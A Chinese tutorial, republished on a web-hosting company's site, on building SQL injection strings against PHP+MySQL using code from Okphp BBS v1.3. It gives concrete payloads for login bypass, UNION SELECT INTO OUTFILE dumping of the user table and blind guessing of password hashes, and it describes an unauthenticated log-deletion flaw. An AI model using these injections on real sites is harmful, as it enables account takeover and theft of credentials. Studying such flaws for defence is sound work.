香港高速VIP云机房火爆上线啦!无需备案,开通即用!配套《巅云自助建站系统3.0》将带给您飞一般的可视化拖拽建站体验,欢迎免费体验。

php 攻击方法之谈php+mysql注射语句构造

一佰互联网站制作(www.yinxi.net) 发布日期 2019-05-01 19:06:15 浏览数: 47

一.前言:
  版本信息:Okphp BBS v1.3 开源版

  由于PHP和MYSQL本身得原因,PHP+MYSQL的注射要比asp困难,尤其是注射时语句的构造方面更是个难点,本文主要是借对Okphp BBS v1.3一些文件得简单分析,来谈谈php+mysql注射语句构造方式,希望本文对你有点帮助。
  声明:文章所有提到的“漏洞”,都没有经过测试,可能根本不存在,其实有没有漏洞并不重要,重要的是分析思路和语句构造。
  二.“漏洞”分析:
  1.admin/login.php注射导致绕过身份验证漏洞:
  代码:
复制代码 代码如下:
  $conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
  $password = md5($password);
  $q = "select id,group_id from $user_table where username="$username" and password="$password"";
  $res = sql_query($q,$conn);
  $row = sql_fetch_row($res);
  $q = "select id,group_id from $user_table where username="$username" and password="$password""中
  
$username 和 $password 没过滤, 很容易就绕过。

  对于select * from $user_table where username="$username" and password="$password"这样的语句改造的方法有:
  构造1(利用逻辑运算):$username=" OR "a"="a $password=" OR "a"="a
  相当于sql语句:
  select * from $user_table where username="" OR "a"="a" and password="" OR "a"="a"
  构造2(利用mysql里的注释语句# ,/* 把$password注释掉):$username=admin"#(或admin"/*)
  即:
  select * from $user_table where username="admin"#" and password="$password""
  相当于:
  select * from $user_table where username="admin"
  在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2:
  select id,group_id from $user_table where username="admin"#" and password="$password""
  相当于:
  select id,group_id from $user_table where username="admin"
  只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id,
  我们就可以这样构造:$username=" OR id=1#
  相当于:
  select id,group_id from $user_table where username="" OR id=1# and password="$password"(#后的被注释掉)
  我们接着往下看代码:
复制代码 代码如下:
  if ($row[0]) {
  // If not admin or super moderator
  if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
  $login = 0;
  }
  else {
  $login = 1;
  }
  }
  // Fail to login---------------
  if (!$login) {
  write_log("Moderator login","0","password wrong");
  echo " ";
  exit();
  }
  // Access ! -------------
  else {
  session_start();

  最后简单通过一个$login来判断,我们只要ie提交直接提交$login=1 就可以绕过了 :)。
  2.users/login.php注射导致绕过身份验证漏洞:
  代码:
复制代码 代码如下:
  $md5password = md5($password);
  $q = "select id,group_id,email from $user_table where username="$username" and password="$md5password"";
  $res = sql_query($q,$conn);
  $row = sql_fetch_row($res);

  $username没过滤利用同1里注释掉and password="$md5password"";

  3.adminloglist.php存在任意删除日志记录漏洞。(ps:这个好象和php+mysql注射无关,随便提一下)
  okphp的后台好象写得很马虎,所有文件都没有判断管理员是否已经登陆,以至于任意访问。我们看list.php的代码:
复制代码 代码如下:
  $arr = array("del_log","log_id","del_id");
  get_r($arr);
  //
  if ($del_log) {
  省略........
  if ($log_id) {
  foreach ($log_id as $val) {
  $q = "delete from $log_table where id="$val"";
  $res = sql_query($q,$conn);
  if ($res) {
  $i++;
  }
  }
  }
  elseif ($del_id) {
  $q = "delete from $log_table where id="$del_id"";
  $res = sql_query($q,$conn);
  }
  $tpl->setVariable("message","$i log deleted ok!");
  $tpl->setVariable("action","index.php?action=list_log");
  }

  代码就只简单的用get_r($arr);判断的提交的参数,我们只要提交相应的$del_log,$log_id,$del_id。就回删除成功。
  4.多个文件对变量没有过滤导致sql注射漏洞。
  okphp的作者好象都不喜欢过滤:)。基本上所有的sql语句中的变量都是“赤裸裸”的。具体那些文件我就不列出来了,请自己看代码,我这里就用forumslist_threads.php为例子简单谈一下。
  看list_threads.php的代码:
复制代码 代码如下:
  $q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id="$forum_id"";
  $res = sql_query($q,$conn);
  $row = sql_fetch_row($res);

  变量$forum_id没有过滤,因为mysql不支持子查询,我们可以利用union构造语句进行联合查询(要求MySQL版本在4.00以上)实现跨库操作,我们构造如下:
  构造1:利用 SELECT * FROM table INTO OUTFILE "/path/file.txt"(要求mysql有file权限,注意在win系统中要绝对路径,如:c://path//file.txt )。把所查询的内容输入到file.txt,然后我们可以通http://ip/path/file.txt来访问得到查询的结果。上面的我们可以这样构造$forum_id:
  $forum_id=" union select * from user_table into outfile "/path/file.txt"
  以下:
  $q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id="$forum_id" union select * from user_table into outfile "/path/file.txt"";
  上面的办法要求比较苛刻,必须得到web的路径(一般可以通过提交错误的变量使mysql报错而得到),而且php的magic_gpc=on选项使注入中不能出现单引号。如果magic_gpc=on我们也可以绕过:
  构造2:就象asp跨库查询一样,直接利用union select构造语句,使返回结果不同来猜解,这种方法可以绕过单引号(magic_gpc=on)继续注射,不过在php里这种注射相对困难,根据具体的代码而定。具体的语句构造请参考pinkeyes 的文章《php注入实例》。下面我就结合okphp给个利用“返回结果不同”注射的例子:(见漏洞5)。
  5.admin/login.php和users/login.php通过sql语句构造可以猜解得到指定用户密码hash:(其实这个和漏洞1和2是同一个,这里单独拿出来,主要是说明语句构造的方法。)
  问题代码同漏洞1。
  语句的构造(ps:因为语句本身就是对用户库操作就没必要用union了):
  $username=admin" AND LENGTH(password)=6#
  sql语句变成:
  $q = "select id,group_id from $user_table where username="admin" AND LENGTH(password)=6#" and password="$password""
  相当于:
  $q = "select id,group_id from $user_table where username="admin" AND LENGTH(password)=6""
  如果LENGTH(password)=6成立,则正常返回,如果不成立,mysql就会报错。
  这样我们就可以猜解用户admin密码hash了。如$username=admin" ord(substring(password,1,1))=57#
  可以猜用户的密码第一位的ascii码值............。
一佰互联是全国知名建站品牌服务商,我们有九年网站建设、网站制作、网页设计、php开发和域名注册及虚拟主机服务经验,提供的自助建站服务更是全国有名。近年来还整合团队优势自主开发了可视化多用户”巅云建站系统“3.0平台版,拖拽排版网站制作设计,轻松实现pc站、手机微网站、小程序、APP一体化全网营销网站建设 ,已成功的为全国上百家网络公司提供自助建站平台搭建服务。

相关新闻more

14
05月
【seo关键词挖掘】seo关键词的选择技巧_

【seo关键词挖掘】seo关键词的选择技巧 seo关键词的选择技巧。关键词的优化在seo中是占着很大的一个比例的,而优化关键词的确... >>详情

30
04月
php max_execution_time

php.ini 中缺省的最长执行时间是 30 秒,这是由 php.ini 中的 max_execution_time 变量指定,倘若你有一个... >>详情

01
05月
php中的一个中文字符串截取函数

PHP代码: ---------------------------------------------------------------... >>详情

26
03月
为您做了一个关于招投标的小程序,请惠存

简介:是不是觉得现在所有的商务信息都要上平台了,而经常不经意就错过了很多原本可以参与的机会。为了用最低成本解决这个问题,我们为您开发了一款小... >>详情

营业执照. cdn加速服务 备案系统认证 网络安全协会 我们的支付方式AAA认证
上海 北京 深圳 广州 天津 杭州 南京 武汉 成都 沈阳 大连 长沙 济南 青岛 苏州 福州 无锡 哈尔滨 宁波 重庆 大庆 厦门 西安 长春 珠海 郑州 海口 昆明 太原 石家庄 温州 合肥 乌鲁木齐 南宁 南通 合肥 兰州 呼和浩特 贵阳 烟台 秦皇岛 包头 唐山 银川 汕头 连云港 威海 西宁 湛江 北海 万州 涪陵 长寿 黔江 永川 丰都 忠县 江津 南川 开县 云阳 万盛 梁平 垫江 巫山 城口 建站宝盒 免费建站 门户网站建设 微信网站 手机网站 门户网站制作

7x24小时服务电话:18581389571 传真:023-85725751 免费建站交流群:236412099 139947842(自助建站交流) E-Mail:post@yinxi.net 网站投诉:
重庆楚捷科技有限公司 一佰互联©版权所有 自助建站(www.yinxi.net,Inc.) 2001-2020 All Rights Reserved 本站程序受法律保护,网站法律顾问:ITLAW-庄毅雄律师
中华人民共和国信息产业部网站备案号:渝ICP备12000592号